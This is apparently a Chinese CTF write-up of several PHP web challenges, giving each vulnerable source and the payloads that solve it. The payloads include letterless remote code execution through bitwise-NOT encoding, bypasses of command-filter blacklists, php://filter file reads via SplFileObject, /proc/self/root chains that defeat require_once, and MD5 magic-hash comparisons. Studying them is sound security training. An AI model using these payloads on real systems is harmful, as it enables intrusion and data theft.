ezPhp

(自己找之前做过的题目拼凑改编出的)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
 <?php
highlight_file(__FILE__);

$query = $_SERVER['QUERY_STRING'];

if (isset($_GET['a'])&&isset($_GET['b'])) {
    echo 'ok';
    echo '<br>';
    $a = $_GET['a'];
    $b = $_GET['b'];
    if (preg_match('/ruheraoguo/', $a . 'hello') && $a != 'ruheraoguo' && !preg_match('/[0-9]/', $b) && intval($b)) {
        echo 'so easy';
        echo '<br>';
            $o_k_k = $_GET['o_k_k'];
            if (!preg_match('/%5f|_|\.|%2E/i', $query) && md5($o_k_k) == $o_k_k) {
                echo 'nice';
                echo '<br>';
                echo new $_POST['a']($_POST['b']);
            }

        }
    }

1
preg_match('/ruheraoguo/', $a . 'hello') && $a != 'ruheraoguo'

preg_match的绕过,\n 或者%0a , 都可以
a=ruheraoguo%0a

1
!preg_match('/[0-9]/', $b) && intval($b)

intval() 对于非空的 array 返回 1,且数组可以绕过preg_match,使其返回false
b[]=1

1
!preg_match('/_|%5f|\.|%2E|\[|%5B/i', $a) && md5($o_k_k) == $o_k_k

php的非法传参,空格会被转换成 _
双MD5($a==md5($a)), 以0e开头的字符串进过MD5加密后依旧以0e开头
网上可以找到很多这样的字符串
o k k=0e00506035745

1
echo new $_POST['a']($_POST['b']);

利用 SplFileObject 配合php伪协议 读取文件

a=SplFileObject&b=php://filter/convert.base64-encode/resource=flag.php

is_php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
 <?php
error_reporting(0);
highlight_file(__FILE__);
include'hint.php';
if(isset($_POST['hhh'])) 
{
  $hhh = preg_replace('/^(.*)level(.*)$/', '${1}<!-- nonono -->${2}', $_POST['hhh']);
  if (preg_match('/pass_level_1/', $hhh)){
      echo $level2;
  }
  else{
      echo "no";
  }
}
else
    echo "???";
?> ???
1
2
3
4
?a=system&b=cat [a-z][a-z][a-z][a-z][a-z][a-z][a-z][a-z]ag.php
    
通配符的绕过,过滤了 ? 和 * 
利用 [a-z] 匹配在a-z之间的字符

flag{sfs-kihk-j2sd-aas}

ezphp

level1.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 <?php
error_reporting(0);
highlight_file(__FILE__);
require_once 'happy.php'; 

if($_COOKIE['name']=="Genshin_Impact") 
{
    $yy = $_GET['pai'];
    if(isset($_GET['pai']))
    {
        require_once($yy);
    } 
}
else 
        die('You should to play Genshin Impact!');
?> You should to play Genshin Impact!

require_once的绕过,多级符号软链接
/proc/self指向当前进程的/proc/pid/,/proc/self/root/是指向/的符号链接

1
2
?pai=php://filter/convert.base64-
encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/happy.php

Levv_vve_ve2.php

1
2
3
4
5
6
7
8
9
10
11
12
13
 <?php
highlight_file(__FILE__);
error_reporting(0);
$flower = $_GET['lily'];
if (preg_match('/[a-zA-Z]+/', $flower)) 
{
    die("you can't use it");
} 
else 
{
    eval($flower);
}
?>

无字母rce取反

1
2
3
4
5
<?php
echo urlencode(~'system');
echo '\n\n';
echo urlencode(~'cat /fllll1laggg.php');
//%8C%86%8C%8B%9A%92\n\n%9C%9E%8B%DF%D0%99%93%93%93%93%CE%93%9E%98%98%98%D1%8F%97%8F
1
2
?lily=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%CE%93%9E%98%98%98%D1%8F%97%8F);
--> system("cat /fllll1laggg.php");

flag{Th1s_@a_TesT_fll1llag}

caiji

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

<?php
$id="nulijiuhui";
$c="woyaoxueweb";
extract($_GET);
highlight_file('index.php');
include("flag.php");
$json=json_decode($_GET['json'],true);
if ($id=="caijiuduolian"&&$json['cai']=="will")
{
    $a=$_POST['a'];
    $b=$_POST['b'];
    if($a!=$b&&md5($a)==md5($b))
{
    {
        if(strlen($c)==12&&preg_match('/I_want_flag_/',$c))
        {
            echo $flag;  
        }
        else{
            die('hacker!');
        }
   }  
}
else{
    echo "jiuchayidiandian!";
}
}
else{
    echo "cai,o!";
 } 
 echo "\n";
 echo $id;
?>
cai,o! nulijiuhui
1
2
3
?id=caijiuduolian&json={"cai":"will"}&c=I_want_flag_
//json语法,json对象是一种存储数据的方式,它使用键值对的形式表示数据
a[]=1&b[]=2

flag{Easy^php_isn’t!!!}

php来咯

1.php

1
2
3
4
5
6
7
8
9
10
11
12
13
 <?php
highlight_file(__FILE__);
error_reporting(0);
include'flag.php';
$md5 = $_GET['md5'];
if (isset($md5) && $md5 == md5($md5))
{
    echo new $_POST['c']($_POST['d']);
}else
{
echo "have a try~";
}
?> have a try~

利用 SplFileObject 配合php伪协议 读取文件

1
2
3
4
?md5=0e00275209979
c=SplFileObject&d=php://filter/convert.base64-encode/resource=flag.php

ssdxgy_xyz_xy.php -->第二关:

ssdxgy_xyz_xy.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
 <?php
highlight_file(__FILE__);
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{
    if(isset($_GET['url']))
{
eval($_GET['url']);
}
else {
     echo "try,try";  
}
    
}
else{
    echo "try,try,try";
}
?> try,try,try
1
2
3
?json={"x":"wllm"}&url=system("cat /fllll1laggg.php");

id=wllmNB

flag{Th2s_@a_TesT23_fll1llag}

ezrce

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
 <?php 
header("Content-Type:text/html;charset=utf-8"); 
error_reporting(0); 
highlight_file(__FILE__); 
if(isset($_GET['wllm'])) 
{ 
    $wllm = $_GET['wllm']; 
    $blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',]; 
    foreach ($blacklist as $blackitem) 
    { 
        if (preg_match('/' . $blackitem . '/m', $wllm)) { 
        die("菜鸡说你的符号不行哦!"); 
    }} 
if(preg_match('/[a-zA-Z]/is',$wllm))   
{ 
    die("你觉得能使用字母嘛!"); 
} 
echo "xbjscj说:你做的很好,但还差一点点哟"; 
eval($wllm); 
} 
else 
{ 
    echo "小伙子要注意审题哦!!!";
} 小伙子要注意审题哦!!!

无字母rce 取反

1
2
3
4
5
6
?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);  ==>  bin boot dev etc fllll1laggg.php home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var 
//system("ls /");
?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%CE%93%9E%98%98%98%D1%8F%97%8F);
//system("cat /fllll1laggg.php");
flag{Th1s_@a_TesT_fll1llag}

水果忍者

一个游戏,在js代码里面找相应的base64字符解码就行

将”无敌火影大王“base64编码后就是flag啦格式flag{转换后的编码}

if(a==md5(a)) 满足这个条件的值+上面内容一起才是真正的flag,格式为flag{上面那个+满足的值}
(这题应该是有问题的,毕竟满足这样条件的a是有很多个来着,题目应该出错了)

a=0e00275209979

ezPHP

1
2
3
4
5
6
7
8
9
10
11
12
 <?php
error_reporting(0);
if(isset($_GET["cmd"])){
    if(preg_match('/et|echo|cat|tac|base|sh|more|less|tail|vi|head|nl|env|\||;|\^|\'|\]|"|<|>|`|\/| |\\\\|\*/i',$_GET["cmd"])){
        echo "Don't Hack Me";
    }else{
        system($_GET["cmd"]);
    }
}else{
    show_source(__FILE__);
}
?>

写的时候就是卡这题了,忘记他没过滤ls,审题不仔细
然后就是字符拼接也卡到了,本来是想着通过 (c.a.t) 拼接的,但没有成功,感觉应该是可以的吧
确实也没想到可以用 $@ 进行拼接,也是学到了 

1
2
3
4
?cmd=cd%09..%26%26cd%09..%26%26cd%09..%26%26t$@ac%09ffff$@llllagggg;
%09-->绕过空格
t$@ac ==> tac  $@绕过tac,用于字符拼接
%26%26  -->  && 可以用于连接多个命令,使得前一个命令成功执行后才执行下一个命令;

flag{12312hjghfghfghfdgd}